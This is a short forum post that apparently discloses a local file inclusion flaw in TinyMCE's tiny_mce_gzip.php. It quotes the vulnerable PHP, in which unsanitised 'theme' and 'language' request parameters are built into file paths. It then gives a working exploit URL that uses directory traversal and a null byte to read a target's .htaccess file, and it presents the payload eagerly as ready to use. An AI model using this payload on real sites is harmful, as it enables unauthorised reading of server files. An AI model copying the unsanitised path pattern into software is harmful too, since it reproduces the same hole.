if magic_quotes_gpc is Off in php.ini then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use;)!!

why?

#code(jscripts/tiny_mce/tiny_mce_gzip.php)

...

$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";

$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";

$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";

...

if ($theme) {

// Write main script and patch some things

echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));

echo 'TinyMCE.prototype.loadScript = function() {};';

echo "tinyMCE.init(TinyMCECompressed_settings);";

// Load theme, language pack and theme language packs

echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));

echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));

echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit

for example!:

http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.
htaccess%00&theme=advanced

...

[ reply ]